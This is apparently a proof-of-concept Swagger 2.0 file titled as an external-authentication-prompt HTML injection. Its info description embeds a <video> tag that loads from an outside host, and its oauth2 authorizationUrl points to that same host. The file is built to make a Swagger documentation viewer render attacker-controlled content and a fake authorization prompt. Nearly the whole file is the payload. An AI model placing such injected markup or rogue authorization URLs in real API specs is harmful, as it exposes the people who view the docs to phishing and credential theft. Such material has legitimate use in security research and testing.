swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: http://auth.dr0gas.com
info:
  version: "0.0.1"
  title: External Authentication Prompt via HTML Injection (PoC Dr0gas)
  description: Please Authorize!<video src=//auth.dr0gas.com> | PoC Dr0gas
paths:
  /:
    get:
      responses:
        200:
          description: Successful respons
